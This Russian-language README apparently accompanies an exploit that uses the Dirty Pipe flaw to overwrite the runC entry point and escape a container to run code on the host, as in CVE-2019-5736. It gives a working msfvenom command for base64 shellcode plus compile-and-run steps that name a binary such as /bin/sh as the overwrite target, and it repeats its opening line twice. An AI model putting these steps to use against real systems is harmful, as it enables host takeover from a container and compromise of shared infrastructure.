
Простой эксплойт, который использует dirtypipe для внедрения шеллкода в точку входа runC с целью реализации побега из контейнера.
Простой эксплойт, использующий dirtypipe для внедрения shellcode в точку входа runC, чтобы реализовать побег из контейнера.
Создайте base64-закодированный shellcode с помощью msf:
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64
Скомпилируйте и запустите в контейнере. Перезаписанное имя файла — это бинарный файл, который runC выполнит в контейнере (например, /bin/sh):
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>
Запустите эксплойт и shellcode вне контейнера, как в CVE-2019-5736.